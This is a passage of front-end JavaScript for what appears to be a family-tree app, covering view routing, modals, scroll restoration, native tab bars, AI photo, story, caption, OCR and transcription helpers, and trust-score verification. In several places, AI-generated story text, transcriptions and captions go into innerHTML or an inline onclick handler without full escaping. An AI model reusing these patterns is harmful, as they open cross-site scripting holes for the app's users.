                    const videoPreview = document.getElementById('video-preview-container');
                    if (videoPreview) videoPreview.classList.add('hidden');
                }

                // Clear form when opening upload-media modal
                if (modalId === 'upload-media-modal') {
                    const form = document.getElementById('upload-media-form');
                    if (form) form.reset();

                    const errorDiv = document.getElementById('upload-media-error');
                    if (errorDiv) errorDiv.textContent = '';
                }
            }
        }

        // JavaScript-driven --vh CSS custom property. iOS Safari doesn't
        // update 100vh (or even 100dvh in some versions) on already-visible
        // fixed-position elements after orientation change. We publish
        // window.innerHeight as --vh on the root element and update it on
        // every resize / orientation change, so styles that use
        // calc(var(--vh) * 100 - Xrem) always reflect the current viewport
        // dimensions. Modals (and any future viewport-sized surface) opt in
        // via that expression.
        function _publishVhVar() {
            document.documentElement.style.setProperty('--vh', window.innerHeight + 'px');
        }
        _publishVhVar();
        window.addEventListener('resize', _publishVhVar);
        window.addEventListener('orientationchange', () => {
            // iOS reports final viewport dimensions a beat after
            // orientationchange fires.
            setTimeout(_publishVhVar, 100);
            setTimeout(_publishVhVar, 300);
        });
        // Session 2e belt: activity recreation / process-death restore on
        // Android can put the WebView back into layout without firing a
        // resize event (WebView returns at the same size but with stale
        // computed styles). visibilitychange fires reliably when the app
        // returns from background — re-publish --vh so modals + any other
        // viewport-height-relative sizing stays honest. Cheap no-op when
        // dimensions haven't drifted. Root-cause viewport meta fix lives
        // in MainActivity.java (useWideViewPort/loadWithOverviewMode).
        document.addEventListener('visibilitychange', () => {
            if (document.visibilityState === 'visible') _publishVhVar();
        });

        function closeModal(modalId) {
            const modal = document.getElementById(modalId);
            if(modal) {
                modal.classList.add('opacity-0');
                modal.querySelector('div > div').classList.add('translate-y-10');
                setTimeout(() => modal.classList.add('pointer-events-none'), 300);

                // Release the body scroll lock. Reference-counted so nested
                // modals wait for the outermost close before restoring.
                if (openModal._openCount && openModal._openCount > 0) {
                    openModal._openCount--;
                    if (openModal._openCount === 0) {
                        document.body.style.overflow = document.body.dataset.savedOverflow || '';
                        delete document.body.dataset.savedOverflow;
                    }
                }

                // Reset invite form when closing (so reopening shows the
                // fresh compose state, not the previous success state).
                if (modalId === 'invite-family-modal') {
                    const formFields = document.getElementById('invite-form-fields');
                    const submitButton = document.querySelector('#invite-family-form button[type="submit"]');
                    const cancelButton = document.querySelector('#invite-family-form button[type="button"]');
                    const subtitle = document.getElementById('invite-family-subtitle');
                    const successDiv = document.getElementById('invite-success');
                    if (formFields) formFields.style.display = '';
                    if (submitButton) submitButton.style.display = '';
                    // Restore the original "Cancel" label/styling that
                    // handleSendInvite may have flipped to "Done" on success.
                    if (cancelButton) {
                        cancelButton.textContent = 'Cancel';
                        cancelButton.className = 'px-6 py-2 font-semibold text-gray-600 border border-gray-300 rounded-md hover:bg-gray-50';
                    }
                    // Restore the compose subtitle.
                    if (subtitle) {
                        subtitle.textContent = 'Generate an invitation link to share with someone you want on your family tree.';
                    }
                    if (successDiv) successDiv.classList.add('hidden');
                }
            }
        }

        function toggleDeathFields() {
            const isAlive = document.getElementById('person-is-alive').checked;
            const deathFields = document.getElementById('death-fields');
            if (deathFields) {
                if (isAlive) {
                    deathFields.classList.add('hidden');
                } else {
                    deathFields.classList.remove('hidden');
                }
            }
        }

        function toggleEditDeathFields() {
            const isAlive = document.getElementById('edit-person-is-alive').checked;
            const deathFields = document.getElementById('edit-death-fields');
            if (deathFields) {
                if (isAlive) {
                    deathFields.classList.add('hidden');
                } else {
                    deathFields.classList.remove('hidden');
                }
            }
        }

        // Session 2c Task 1: per-view scroll position preservation. Map keyed
        // by viewId. On navigateToView entry, save the OUTGOING view's scrollY;
        // on new view render, restore that view's saved scrollY (or 0 if
        // never visited). Applied via requestAnimationFrame after render so
        // the DOM has laid out. Native + web behavior identical — cheap on
        // both.
        //
        // Views excluded from scroll preservation: family-tree-view (D3 zoom/
        // pan canvas — window.scrollY isn't the right UX), chat-view (each
        // conversation has its own message-thread scroll pane), person-detail-view
        // (transient drill-in, back-to-parent should return to parent's scroll
        // not persist). Feed, Members, Photos, Profile, Calendar all preserve.
        const _viewScrollPositions = new Map();
        const _SCROLL_PRESERVE_SKIP = new Set([
            'family-tree-view',
            'chat-view',
            'person-detail-view',
            'album-detail-view',
        ]);

        function _saveScrollForView(viewId) {
            if (!viewId) return;
            if (_SCROLL_PRESERVE_SKIP.has(viewId)) return;
            _viewScrollPositions.set(viewId, window.scrollY || 0);
        }
        // Track any in-flight restore so we can cancel it on a subsequent nav.
        let _pendingScrollRestore = null;

        function _restoreScrollForView(viewId) {
            // Cancel any pending restore from a prior nav (subsequent tab
            // switches supersede earlier ones).
            if (_pendingScrollRestore) {
                if (_pendingScrollRestore.observer) _pendingScrollRestore.observer.disconnect();
                if (_pendingScrollRestore.timer) clearTimeout(_pendingScrollRestore.timer);
                _pendingScrollRestore = null;
            }

            if (_SCROLL_PRESERVE_SKIP.has(viewId)) {
                requestAnimationFrame(() => window.scrollTo(0, 0));
                return;
            }
            const y = _viewScrollPositions.get(viewId) || 0;
            if (y === 0) {
                requestAnimationFrame(() => window.scrollTo(0, 0));
                return;
            }

            // MutationObserver approach — watches for content-height changes
            // on the app's main content area. When document is tall enough
            // to accommodate our target scrollY, fire scrollTo and disconnect.
            // Handles both synchronous renders (fires immediately after first
            // mutation) and async fetches (waits for real content to land).
            //
            // Belt: 2s absolute timeout — force-scroll to whatever we've got
            // rather than leaving the observer orphaned. Also handles the
            // legitimate case where user's target scrollY is now taller than
            // the fresh content (posts got deleted, view was pruned, etc).
            const mainContent = document.getElementById('main-content');
            if (!mainContent) return;

            const tryScroll = () => {
                const maxScroll = document.documentElement.scrollHeight - window.innerHeight;
                if (maxScroll >= y - 20) {
                    window.scrollTo(0, y);
                    cleanup();
                    return true;
                }
                return false;
            };

            const cleanup = () => {
                if (!_pendingScrollRestore) return;
                if (_pendingScrollRestore.observer) _pendingScrollRestore.observer.disconnect();
                if (_pendingScrollRestore.timer) clearTimeout(_pendingScrollRestore.timer);
                _pendingScrollRestore = null;
            };

            // Try immediately (subsequent visits may have synchronously-
            // available cached content).
            if (tryScroll()) return;

            const observer = new MutationObserver(() => { tryScroll(); });
            observer.observe(mainContent, { childList: true, subtree: true });

            const timer = setTimeout(() => {
                // Final attempt — scroll to whatever we've got.
                const maxScroll = document.documentElement.scrollHeight - window.innerHeight;
                window.scrollTo(0, Math.min(y, Math.max(0, maxScroll)));
                cleanup();
            }, 2000);

            _pendingScrollRestore = { observer, timer };
        }

        // Session 2c Task 1: native tab bar handlers. ebwNavigateTab is the
        // wrapper the tab bar uses to route through navigateToView with an
        // active-state class update. ebwNativeTabAdd is the Add-tab handler
        // — modal launcher, no view. For now wires to the existing quick
        // upload flow; Task 4 rewires to @capacitor/camera with library
        // choice + client-side compression.
        function ebwNavigateTab(viewId) {
            // Session 2c Task 3: haptic punctuation on tab switch.
            if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();
            if (viewId === 'family-tree-view') {
                // Match the existing sidebar Family Tree behavior — force
                // the family-tree tab open (not last-viewed sub-tab).
                _ftvForceOpenFamilyTreeTab = true;
            }
            navigateToView(viewId);
        }
        function ebwNativeTabAdd() {
            // Session 2c Task 3: haptic on photo-capture-entry-point tap.
            // Session 2c.1 #5: opens an action sheet with three options —
            // Take Photo / Choose from Library / Write a Post — so the Add
            // tab can also start a text post. Handlers below route to the
            // native picker with the correct source OR open the compose
            // modal.
            if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();
            openModal('add-action-sheet-modal');
        }

        // Session 2c.1 #5: action-sheet item handlers. Each closes the sheet
        // first, then defers the destination action so the closing animation
        // is visible + not fighting the next modal open.
        function ebwAddSheetTakePhoto() {
            closeModal('add-action-sheet-modal');
            setTimeout(() => {
                if (typeof window.nativePickAndCompressImage === 'function' &&
                    window.Capacitor && window.Capacitor.isNativePlatform && window.Capacitor.isNativePlatform()) {
                    _quickUploadViaNativePicker({ source: 'camera' });
                } else {
                    // Web fallback: no native camera; fall through to the file
                    // input which surfaces the browser's camera capture affordance
                    // on mobile browsers via the input's capture attribute.
                    document.getElementById('quick-upload-input').click();
                }
            }, 200);
        }
        function ebwAddSheetChooseFromLibrary() {
            closeModal('add-action-sheet-modal');
            setTimeout(() => {
                if (typeof window.nativePickAndCompressImage === 'function' &&
                    window.Capacitor && window.Capacitor.isNativePlatform && window.Capacitor.isNativePlatform()) {
                    _quickUploadViaNativePicker({ source: 'photos' });
                } else {
                    document.getElementById('quick-upload-input').click();
                }
            }, 200);
        }
        function ebwAddSheetWritePost() {
            closeModal('add-action-sheet-modal');
            setTimeout(() => openModal('create-post-modal'), 200);
        }
        // Session 2c.2: title map for the native header center slot.
        // Feed is intentionally empty — Instagram convention, and the wordmark
        // is the identity signal. Non-Feed views get their section name.
        const _NATIVE_APP_TITLES = {
            'feed-view': '',
            'family-tree-view': 'Family Tree',
            'members-view': 'Family & Connections',
            'photo-albums-view': 'Photos',
            'album-detail-view': 'Photos',
            'chat-view': 'Chat',
            'calendar-view': 'Calendar',
            'documents-view': 'Documents',
            'profile-view': 'Profile',
            'person-detail-view': 'Family Tree',
            'connections-view': 'Family & Connections',
        };
        function _updateNativeAppTitle(viewId) {
            const slot = document.getElementById('header-app-title');
            if (!slot) return;
            const key = viewId || (window.location.hash || '').slice(1) || 'feed-view';
            const title = Object.prototype.hasOwnProperty.call(_NATIVE_APP_TITLES, key)
                ? _NATIVE_APP_TITLES[key]
                : '';
            slot.textContent = title;
        }
        // Update the active-tab visual state on the native tab bar. Reads
        // location.hash and marks the matching data-tab button. Called from
        // renderApp after every view change so hash+state stay in sync.
        function _updateNativeTabActive() {
            const tabbar = document.querySelector('.ebw-native-tabbar');
            if (!tabbar) return;
            const hash = window.location.hash || '';
            const currentView = hash.length > 1 ? hash.slice(1) : 'feed-view';
            // Photos + Family & Connections views absorb into Feed / Tree tabs
            // respectively — brief IA decision.
            const activeMap = {
                'photo-albums-view': 'feed-view',
                // Family & Connections view is actually 'members-view' — the "Family &
                // Connections" label is just what MembersPage titles itself. Tree tab
                // shows active there per v2 IA absorption.
                'members-view': 'family-tree-view',
                'calendar-view': 'profile-view',
                'documents-view': 'profile-view',
                'person-detail-view': 'family-tree-view',
                'album-detail-view': 'feed-view',
            };
            const activeTab = activeMap[currentView] || currentView;
            tabbar.querySelectorAll('button[data-tab]').forEach(btn => {
                if (btn.dataset.tab === activeTab) {
                    btn.classList.add('active');
                } else {
                    btn.classList.remove('active');
                }
            });
        }

        function navigateToView(viewId, params = {}, pushToHistory = true) {
            // Session 2c: save scroll position of the view we're LEAVING before
            // any state mutation.
            _saveScrollForView(appState.currentView);
            if (appState.firestoreUnsubscribe) appState.firestoreUnsubscribe();

            // Clean up tree tooltip when leaving any view
            const treeTooltip = document.querySelector('.tree-card-tooltip');
            if (treeTooltip) treeTooltip.remove();

            // Feature-flag guard: bounce deferred views to the feed
            if (viewId === 'documents-view' && !FEATURES.documents) {
                viewId = 'feed-view';
            }

            // Validate person-detail-view has person data
            if (viewId === 'person-detail-view' && !params.person) {
                console.error("Cannot navigate to person-detail-view without person data");
                viewId = 'family-tree-view'; // Fallback to family tree
            }

            appState.currentView = viewId;
            // Save current view to localStorage for page refresh persistence
            localStorage.setItem('lastView', viewId);

            // Store current person for person-detail-view
            if (viewId === 'person-detail-view' && params.person) {
                appState.currentPerson = params.person;
            }

            // Update browser history
            const state = { viewId, params };
            const url = `#${viewId}`;
            if (pushToHistory) {
                history.pushState(state, '', url);
            } else {
                history.replaceState(state, '', url);
            }

            const mainContent = document.getElementById('main-content');
            const modalContainer = document.getElementById('modal-container');
            if (!mainContent) return;
            mainContent.innerHTML = '';

            // Release any stuck body scroll locks left by orphaned modals
            // or the photo lightbox. modalContainer.innerHTML rewrite below
            // discards the modal DOM, so any lock state that depended on
            // the closed callback firing (openModal reference count,
            // lightbox savedOverflow marker) is now stale. Reset before
            // any new modal opens. Fires on every navigateToView so the
            // whole class of "user navigated away with a modal open" leaks
            // self-heals.
            if (openModal._openCount || 'savedOverflow' in document.body.dataset || 'lightboxSavedOverflow' in document.body.dataset) {
                document.body.style.overflow = '';
                delete document.body.dataset.savedOverflow;
                delete document.body.dataset.lightboxSavedOverflow;
                openModal._openCount = 0;
            }

            if (viewId === 'feed-view') mainContent.innerHTML = FeedPage();
            else if (viewId === 'family-tree-view') {
                // Users with no own tree but a pending join request OR who
                // previously completed onboarding (post-block case) see the
                // waiting screen instead of the empty tree UI. Once they have
                // hasTree=true they fall through to the normal FamilyTreePage.
                if (!appState.hasTree && (appState.pendingTreeRequests?.length > 0 || appState.onboardingCompleted)) {
                    mainContent.innerHTML = WaitingForAcceptancePage(appState.pendingTreeRequests || []);
                } else {
                    mainContent.innerHTML = FamilyTreePage();
                }
            }
            else if (viewId === 'photo-albums-view') mainContent.innerHTML = PhotoAlbumsPage();
            else if (viewId === 'album-detail-view') mainContent.innerHTML = AlbumDetailPage(params.albumId, params.albumTitle, params.albumDescription, params.albumIsDefault, params.sharedRole);
            else if (viewId === 'person-detail-view') {
                mainContent.innerHTML = PersonDetailPage(params.person);
                // Load trust info for this person
                if (params.person?.id) loadTrustInfo(params.person.id, appState.currentTreeId);
            }
            else if (viewId === 'search-results-view') mainContent.innerHTML = SearchResultsPage(params.query, params.results);
            else if (viewId === 'documents-view') mainContent.innerHTML = DocumentsPage();
            else if (viewId === 'chat-view') {
                // Master-detail: always land on the conversation list when
                // entering Chat. selectConversation flips to 'thread';
                // backToConversationList flips back.
                _chatMobilePane = 'list';
                mainContent.innerHTML = ChatPage();
            }
            else if (viewId === 'calendar-view') mainContent.innerHTML = CalendarPage();
            else if (viewId === 'members-view') mainContent.innerHTML = MembersPage();
            else if (viewId === 'profile-view') mainContent.innerHTML = ProfilePage();

            document.querySelectorAll('#sidebar-nav .sidebar-link').forEach(link => {
                link.classList.remove('active');
                if (link.dataset.nav === viewId || 
                   (viewId === 'album-detail-view' && link.dataset.nav === 'photo-albums-view') ||
                   (viewId === 'person-detail-view' && link.dataset.nav === 'family-tree-view')) {
                    link.classList.add('active');
                }
            });
            
            modalContainer.innerHTML = CreateAlbumModal() + RenameAlbumModal() + ShareAlbumModal() + CreateEventModal() + CreateTreeModal() + RenameTreeModal() + CreatePostModal() + AddPersonModal() + EditProfileModal() + InviteFamilyModal() + PhoneSignupModal() + PhotoLightboxModal() + ShareDocumentModal() + UploadPhotoModal() + AIToolsModal() + AddActionSheetModal();

            console.log("Attaching form event listeners...");
            const addPersonForm = document.getElementById('add-person-form');
            console.log("Add person form found:", addPersonForm ? "YES" : "NO");

            document.getElementById('create-album-form')?.addEventListener('submit', handleCreateAlbum);
            document.getElementById('rename-album-form')?.addEventListener('submit', handleRenameAlbum);
            document.getElementById('create-event-form')?.addEventListener('submit', handleCreateEvent);
            document.getElementById('create-tree-form')?.addEventListener('submit', handleCreateTree);
            document.getElementById('create-post-form')?.addEventListener('submit', handleCreatePost);
            document.getElementById('edit-profile-form')?.addEventListener('submit', handleSaveProfile);
            document.getElementById('invite-family-form')?.addEventListener('submit', handleSendInvite);

            if (addPersonForm) {
                addPersonForm.addEventListener('submit', handleAddPerson);
                console.log("Add person form listener attached!");
            } else {
                console.error("Add person form NOT found!");
            }

            if (viewId === 'person-detail-view') {
                modalContainer.innerHTML += UploadMediaModal(params.person.id);
                document.getElementById('upload-media-form')?.addEventListener('submit', handleMediaUpload);
            } else if (viewId === 'documents-view') {
                modalContainer.innerHTML += UploadMediaModal();
                document.getElementById('upload-media-form')?.addEventListener('submit', handleMediaUpload);
            } else if (viewId === 'chat-view') {
                modalContainer.innerHTML += NewMessageModal() + RecipientPickerModal();
                document.getElementById('new-message-form')?.addEventListener('submit', handleNewMessage);
            }
            
            if (viewId === 'feed-view') {
                // Run feed and birthdays loading in parallel for faster page load
                Promise.all([
                    fetchAndRenderFeed(),
                    fetchAndRenderBirthdays()
                ]).catch(error => {
                    console.error('Error loading feed data:', error);
                });
                initializePullToRefresh();
                startNewPostsMonitoring();
            } else {
                // Stop monitoring when leaving feed view
                stopNewPostsMonitoring();
            }
            if (viewId === 'family-tree-view') {
                modalContainer.innerHTML += AddRelationshipModal();
                document.getElementById('add-relationship-form')?.addEventListener('submit', handleAddRelationship);
                loadFamilyTreeData();
            }
            if (viewId === 'photo-albums-view') {
                // Prompt 15: own albums + shared-with-you rendered in
                // parallel. Independent fetches so a slow /shared-albums
                // doesn't block the primary grid render.
                fetchAndRenderAlbums();
                fetchAndRenderSharedAlbums();
            }
            if (viewId === 'album-detail-view') {
                fetchAndRenderPhotos(params.albumId, params.sharedRole);
                // Viewers have no upload input, so the null-safe ?. is
                // load-bearing here — don't tighten it back.
                document.getElementById('album-upload-input')?.addEventListener('change', handleAlbumUpload);
            }
            if (viewId === 'person-detail-view') {
                modalContainer.innerHTML += AddRelationshipModal();
                document.getElementById('add-relationship-form')?.addEventListener('submit', handleAddRelationship);
                fetchAndRenderMedia(params.person.id);
                renderPersonRelationships(params.person.id);
                // Phase 3 fix: if the tree cache is empty (hard refresh, or
                // direct link), refetch so the fresh privacy_mode etc. lands
                // and re-render the page with the updated Person. Prevents
                // the stale privacy banner reported in Session 2 smoke.
                const hasFreshTree = appState.treeData
                    && Array.isArray(appState.treeData.persons)
                    && appState.treeData.persons.some(p => p && p.id === params.person.id);
                if (!hasFreshTree && appState.currentTreeId) {
                    loadFamilyTreeData().then(() => {
                        const freshPerson = appState.treeData?.persons?.find(p => p && p.id === params.person.id);
                        if (freshPerson && document.getElementById('person-detail-view')) {
                            mainContent.innerHTML = PersonDetailPage(freshPerson);
                            renderPersonRelationships(freshPerson.id);
                        }
                    }).catch(() => { /* noop — fall back to stale render */ });
                }
            }
            if (viewId === 'documents-view') fetchAndRenderAllMedia();
            if (viewId === 'calendar-view') fetchAndRenderCalendars();
            if (viewId === 'chat-view') {
                fetchAndRenderConversations();
                loadTreeMembersForChat(); // Load members for the "New Message" dropdown
            }
            if (viewId === 'members-view') fetchAndRenderMembers();
            if (viewId === 'profile-view') loadAndRenderProfile();

            // Load user avatar in header
            loadUserAvatar();

            // Session 2c: restore scroll for the view we just navigated TO,
            // and sync the native tab bar's active-state visual with the
            // new location.hash.
            _restoreScrollForView(viewId);
            _updateNativeTabActive();
            _updateNativeAppTitle(viewId);
        }


        // --- AI / GEMINI FUNCTIONS ---

        // AI Photo Description
        async function aiDescribePhoto(photoId) {
            const container = document.getElementById('ai-photo-result');
            if (!container) return;

            container.classList.remove('hidden');
            // Scroll region + full opaque bg + compositor-flash mitigation
            // ladder (overscroll-contain + fully-opaque bg + will-change-scroll)
            // live on the INNER card — the outer container is just a
            // positioning wrapper. See CLAUDE.md 2026-07-17 Edit Profile fix.
            container.innerHTML = `
                <div class="bg-purple-900 border border-purple-500 rounded-lg p-4 shadow-xl max-h-48 overflow-y-auto overscroll-contain will-change-scroll">
                    <p class="animate-pulse text-purple-300 text-center">Analyzing photo...</p>
                </div>`;

            try {
                const response = await apiFetch(`${API_BASE_URL}/photos/${photoId}/ai-describe`, { method: 'POST' });
                if (response.ai_analysis) {
                    const a = response.ai_analysis;
                    container.innerHTML = `
                        <div class="bg-purple-900 border border-purple-500 rounded-lg p-4 shadow-xl max-h-48 overflow-y-auto overscroll-contain will-change-scroll">
                            <div class="flex items-center justify-between mb-2">
                                <h4 class="font-semibold text-purple-300">AI Analysis</h4>
                                <button onclick="document.getElementById('ai-photo-result').classList.add('hidden')" class="text-purple-300 hover:text-white text-xl leading-none">&times;</button>
                            </div>
                            <p class="text-white mb-2">${escapeHtml(a.description)}</p>
                            ${a.estimated_era ? `<p class="text-sm text-purple-200">Era: ${escapeHtml(a.estimated_era)}</p>` : ''}
                            ${a.suggested_tags?.length ? `<p class="text-sm text-purple-200">Suggested tags: ${escapeHtml(a.suggested_tags.join(', '))}</p>` : ''}
                        </div>`;
                }
            } catch (error) {
                console.error('AI describe error:', error);
                container.innerHTML = `
                    <div class="bg-red-900 border border-red-500 rounded-lg p-4 shadow-xl max-h-48 overflow-y-auto overscroll-contain will-change-scroll">
                        <div class="flex items-center justify-between">
                            <p class="text-red-300">Could not analyze photo.</p>
                            <button onclick="document.getElementById('ai-photo-result').classList.add('hidden')" class="text-red-300 hover:text-white text-xl leading-none">&times;</button>
                        </div>
                    </div>`;
            }
        }

        // AI Story Generator
        async function generateAIStory(personId, treeId) {
            const container = document.getElementById('ai-story-container');
            const content = document.getElementById('ai-story-content');
            if (container) container.classList.remove('hidden');
            if (content) content.innerHTML = '<p class="animate-pulse text-purple-600">Generating story...</p>';

            try {
                const response = await apiFetch(`${API_BASE_URL}/trees/${treeId || appState.currentTreeId}/person/${personId}/ai-story`, {
                    method: 'POST',
                    body: { tone: 'warm' }
                });
                if (content && response.story) {
                    content.innerHTML = `
                        <div class="bg-purple-50 border border-purple-200 rounded-lg p-4">
                            <div class="prose prose-sm max-w-none text-gray-700">${response.story.replace(/\n/g, '<br>')}</div>
                            <p class="text-xs text-gray-400 mt-3">AI-generated from: ${response.sources_used.join(', ')}</p>
                        </div>`;
                }
            } catch (error) {
                console.error('AI story error:', error);
                if (content) content.innerHTML = '<p class="text-red-500">Could not generate story. Please try again.</p>';
            }
        }

        // AI Caption Suggestions
        async function suggestAICaption() {
            const btn = document.getElementById('suggest-caption-btn');
            const div = document.getElementById('caption-suggestions');
            if (!selectedMixedMedia?.length) return;

            // Only works with images
            const firstFile = selectedMixedMedia[0];
            if (!firstFile.type.startsWith('image/')) {
                alert('AI captions only work with photos, not videos.');
                return;
            }

            btn.disabled = true;
            btn.innerHTML = '<span class="animate-pulse">Thinking...</span>';

            try {
                const formData = new FormData();
                formData.append('photo', firstFile);

                const response = await fetch(`${API_BASE_URL}/ai/suggest-caption`, {
                    method: 'POST',
                    headers: { 'Authorization': `Bearer ${appState.authToken}` },
                    body: formData
                });
                const data = await response.json();

                if (data.error) throw new Error(data.error);

                if (data.captions && div) {
                    div.classList.remove('hidden');
                    div.innerHTML = '<p class="text-xs text-gray-500 mb-2">Click a caption to use it:</p>' +
                        data.captions.map(c => `
                        <button type="button" onclick="document.getElementById('post-content').value='${c.replace(/'/g, "\\'")}'; this.parentElement.classList.add('hidden');"
                            class="block w-full text-left px-3 py-2 text-sm bg-purple-50 hover:bg-purple-100 rounded border border-purple-200 mb-1">
                            "${c}"
                        </button>`).join('');
                }
            } catch (e) {
                console.error('AI caption error:', e);
                if (div) {
                    div.classList.remove('hidden');
                    div.innerHTML = '<p class="text-red-500 text-sm">Could not generate captions. Please try again.</p>';
                }
            } finally {
                btn.disabled = false;
                btn.innerHTML = 'Suggest Caption';
            }
        }

        // AI OCR Document Analysis
        async function analyzeDocument() {
            const fileInput = document.getElementById('ocr-file-input');
            const resultDiv = document.getElementById('ocr-result');
            const btn = document.getElementById('ocr-analyze-btn');

            if (!fileInput?.files?.length) {
                alert('Please select a document image first.');
                return;
            }

            btn.disabled = true;
            btn.innerHTML = '<span class="animate-pulse">Analyzing document...</span>';
            resultDiv.classList.remove('hidden');
            resultDiv.innerHTML = '<p class="animate-pulse text-purple-600">Extracting text and analyzing document...</p>';

            try {
                const formData = new FormData();
                formData.append('document', fileInput.files[0]);

                const response = await fetch(`${API_BASE_URL}/ai/ocr-document`, {
                    method: 'POST',
                    headers: { 'Authorization': `Bearer ${appState.authToken}` },
                    body: formData
                });
                const data = await response.json();

                if (data.error) throw new Error(data.error);

                resultDiv.innerHTML = `
                    <div class="bg-purple-50 border border-purple-200 rounded-lg p-4 space-y-3">
                        <h4 class="font-semibold text-purple-800">Document Analysis</h4>
                        ${data.document_type ? `<p class="text-sm"><strong>Type:</strong> ${escapeHtml(data.document_type)}</p>` : ''}
                        ${data.estimated_date ? `<p class="text-sm"><strong>Estimated Date:</strong> ${escapeHtml(data.estimated_date)}</p>` : ''}
                        ${data.names_mentioned?.length ? `<p class="text-sm"><strong>Names Mentioned:</strong> ${escapeHtml(data.names_mentioned.join(', '))}</p>` : ''}
                        ${data.summary ? `<p class="text-sm"><strong>Summary:</strong> ${escapeHtml(data.summary)}</p>` : ''}
                        <div class="mt-3 pt-3 border-t border-purple-200">
                            <strong class="text-sm">Extracted Text:</strong>
                            <pre class="mt-2 p-3 bg-white rounded border text-xs whitespace-pre-wrap max-h-64 overflow-y-auto">${escapeHtml(data.extracted_text || 'No text extracted')}</pre>
                        </div>
                    </div>`;
                // Scroll to show results
                setTimeout(() => {
                    resultDiv.scrollIntoView({ behavior: 'smooth', block: 'start' });
                }, 100);
            } catch (e) {
                console.error('OCR error:', e);
                resultDiv.innerHTML = '<p class="text-red-500">Could not analyze document. Please try again.</p>';
            } finally {
                btn.disabled = false;
                btn.innerHTML = 'Analyze Document';
            }
        }

        // AI Audio Transcription
        async function transcribeAudio() {
            const fileInput = document.getElementById('audio-file-input');
            const resultDiv = document.getElementById('audio-result');
            const btn = document.getElementById('audio-transcribe-btn');

            if (!fileInput?.files?.length) {
                alert('Please select an audio file first.');
                return;
            }

            btn.disabled = true;
            btn.innerHTML = '<span class="animate-pulse">Transcribing audio...</span>';
            resultDiv.classList.remove('hidden');
            resultDiv.innerHTML = '<p class="animate-pulse text-purple-600">Transcribing audio... This may take a moment for longer recordings.</p>';

            try {
                const formData = new FormData();
                formData.append('audio', fileInput.files[0]);

                const response = await fetch(`${API_BASE_URL}/ai/transcribe-audio`, {
                    method: 'POST',
                    headers: { 'Authorization': `Bearer ${appState.authToken}` },
                    body: formData
                });
                const data = await response.json();

                if (data.error) throw new Error(data.error);

                resultDiv.innerHTML = `
                    <div class="bg-purple-50 border border-purple-200 rounded-lg p-4 space-y-3">
                        <h4 class="font-semibold text-purple-800">Audio Transcription</h4>
                        ${data.language ? `<p class="text-sm"><strong>Language:</strong> ${escapeHtml(data.language)}</p>` : ''}
                        ${data.content_type ? `<p class="text-sm"><strong>Content Type:</strong> ${escapeHtml(data.content_type)}</p>` : ''}
                        ${data.names_mentioned?.length ? `<p class="text-sm"><strong>Names Mentioned:</strong> ${escapeHtml(data.names_mentioned.join(', '))}</p>` : ''}
                        ${data.places_mentioned?.length ? `<p class="text-sm"><strong>Places Mentioned:</strong> ${escapeHtml(data.places_mentioned.join(', '))}</p>` : ''}
                        ${data.summary ? `<p class="text-sm"><strong>Summary:</strong> ${escapeHtml(data.summary)}</p>` : ''}
                        <div class="mt-3 pt-3 border-t border-purple-200">
                            <strong class="text-sm">Full Transcription:</strong>
                            <div class="mt-2 p-3 bg-white rounded border text-sm whitespace-pre-wrap max-h-64 overflow-y-auto">${data.transcription || 'No transcription available'}</div>
                        </div>
                    </div>`;
                // Scroll to show results
                setTimeout(() => {
                    resultDiv.scrollIntoView({ behavior: 'smooth', block: 'start' });
                }, 100);
            } catch (e) {
                console.error('Audio transcription error:', e);
                resultDiv.innerHTML = '<p class="text-red-500">Could not transcribe audio. Please try again.</p>';
            } finally {
                btn.disabled = false;
                btn.innerHTML = 'Transcribe Audio';
            }
        }

        // --- TRUST SCORE / VERIFICATION FUNCTIONS ---

        // Load and display trust info for a person
        async function loadTrustInfo(personId, treeId) {
            const container = document.getElementById('trust-info-container');
            if (!container) return;

            try {
                const response = await apiFetch(`${API_BASE_URL}/trees/${treeId || appState.currentTreeId}/person/${personId}/trust-info`);

                const score = response.trust_score || 0;
                let scoreColor = 'bg-red-500';
                let scoreLabel = 'Unverified';

                if (score >= 75) {
                    scoreColor = 'bg-green-500';
                    scoreLabel = 'Well Verified';
                } else if (score >= 50) {
                    scoreColor = 'bg-yellow-500';
                    scoreLabel = 'Partially Verified';
                } else if (score > 0) {
                    scoreColor = 'bg-orange-500';
                    scoreLabel = 'Needs Verification';
                }

                container.innerHTML = `
                    <div class="bg-gray-50 border border-gray-200 rounded-lg p-4">
                        <div class="flex items-center justify-between mb-3">
                            <h4 class="font-semibold text-gray-800 flex items-center gap-2">
                                ${tablerIcon('shield-check', { size: 20, className: 'text-blue-600', preserveColor: true })}
                                Trust Score
                            </h4>
                            <div class="flex items-center gap-2">
                                <div class="w-24 h-3 bg-gray-200 rounded-full overflow-hidden">
                                    <div class="${scoreColor} h-full rounded-full transition-all" style="width: ${Math.min(score, 100)}%"></div>
                                </div>
                                <span class="text-sm font-medium ${score >= 75 ? 'text-green-600' : score >= 50 ? 'text-yellow-600' : 'text-red-600'}">${Math.round(score)}%</span>
                            </div>
                        </div>
                        <p class="text-sm text-gray-600 mb-3">
                            <span class="font-medium">${scoreLabel}</span> ·
                            ${response.verification_count} of ${response.family_member_count} family members verified
                        </p>
                        <button
                            onclick="${response.user_has_verified ? `removeVerification(${personId})` : `verifyPerson(${personId})`}"
                            class="w-full px-4 py-2 rounded-md font-medium transition-colors ${
                                response.user_has_verified
                                    ? 'bg-gray-200 text-gray-700 hover:bg-gray-300'
                                    : 'bg-blue-600 text-white hover:bg-blue-700'
                            }">
                            ${response.user_has_verified ? '✓ You Verified This · Click to Remove' : 'Verify This Information'}
                        </button>
                        ${response.last_edited_at ? `<p class="text-xs text-gray-400 mt-2">Last edited: ${new Date(response.last_edited_at).toLocaleDateString()}</p>` : ''}
                    </div>
                `;
            } catch (error) {
                console.error('Error loading trust info:', error);
                container.innerHTML = '<p class="text-sm text-gray-400">Trust info unavailable</p>';
            }
        }

        // Verify a person's information
        async function verifyPerson(personId) {
            try {
                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person/${personId}/verify`, {
                    method: 'POST'
                });
                // Reload trust info to update UI
                loadTrustInfo(personId, appState.currentTreeId);
            } catch (error) {
                console.error('Error verifying person:', error);
                alert(error.message || 'Could not verify. Please try again.');
            }
        }

        // Remove verification from a person
        async function removeVerification(personId) {
            try {
                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person/${personId}/verify`, {
                    method: 'DELETE'
                });
                // Reload trust info to update UI
